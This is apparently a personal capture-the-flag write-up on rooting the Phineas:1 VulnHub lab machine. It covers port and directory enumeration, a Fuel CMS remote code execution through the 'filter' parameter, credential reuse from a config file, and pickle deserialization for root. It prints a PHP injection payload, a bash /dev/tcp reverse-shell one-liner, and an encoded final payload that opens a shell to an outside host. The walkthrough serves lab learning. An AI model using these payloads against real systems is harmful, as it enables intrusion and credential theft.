Hi guys!, in this write-up we will see how to get root on the Phineas:1 vulnhub machine.
Let’s start with nmap scan to find all open ports.The result shows total 4 ports 22,80,111 and 3306 are open.
Now let’s find service version on above open ports.
Let’s open the IP in browser, nothing interesting.
Time to enumerate the web directories and files. Only one directory.
Visiting /structure shows below page.
This time lets use gobuster, let’s see what we will get:
Let’s open robots.txt, it shows /fuel and same is also shown by gobuster scan.
Let’s use gobuster one more time on /structure/fuel.
I opened, /sturcture/index.php/fuel/login and it gave me the below page.
This confirms thah fuel CMS is running. To find exploit if any, I searched on google for Fuel CMS exploit.It look like we FUEL CMS is vulnerable to RCE.
The exploit, shows the path “fuel/pages/select/?filter=” is vulnerable to RCE. I used below exploit shown after filter to simply run ‘ls’ command.
‘%2Bpi(print(%24a%3D’system’))%2B%24a(‘ls’)%2B’ {value of URL encoded string}
After doing this when I open the page, it shows me nothing.
But when I checked the page source of same page, I got the result of the ‘ls’ command.
I set up the burp proxy and send the request to Repeater tab. This time I used hostname command, and below is the result for the same.
Time to get the shell on the box:
Start the netcat listener on port 443 on Kali machine to catch reverse shell. Will use below payload to get reverse shell. Change IP and port as per your system.
bash -i >& /dev/tcp/10.0.0.1/4242 0>&1
Final Payload.
%27%25%32%42%70%69%28%70%72%69%6e%74%28%25%32%34%61%25%33%44%27%73%79%73%74%65%6d%27%29%29%25%32%42%25%32%34%61%28%27%62%61%73%68%20%2d%69%20%3e%26%20%2f%64%65%76%2f%74%63%70%2f%31%39%32%2e%31%36%38%2e%39%2e%33%2f%34%34%33%20%30%3e%26%31%27%29%25%32%42%27
Got the shell on the box:
Like wordpress has wp-config.php, the fuel CMS has database.php file which contains database name, username and password. The location of the file is “/var/www/html/structure/fuel/application/config”
I checked the /etc/passwd file to get the name of potential users, I saw anna is present on the system.
After trying ssh with user anna and password in database.php file, I am able to login.
In /home/anna, there is a directory called “web” which has below contents.
When I used netsta -antp command, I saw something is running on port 5000.
I used curl command to request localhost on port 5000.
Port Forwarding.
I used port forwarding to forward it on my local host on port 5000. Nmap shows the service rurring on it.
From app.py it shows that it is using pickle. Pickle is serialization module in python and it is vulnerable to RCE.
As written in app.py if user need to send the POST request to the endpoint heaven and with data in awesome parameter which use pickle on it. I searched for exploiting the pickle to get RCE. This gave me the result.
To understand the concept, please read the article. I copied the code from the link and change it to give me reverse shell.
Before sending the request to the application on port 5000, create te payload and start the netcat listener on port 4444 on Kali machine.
Payload generated using exploit:
Got root shell on port 4444 on Kali machine.
Hope you guys like it. Thanks for reading!!
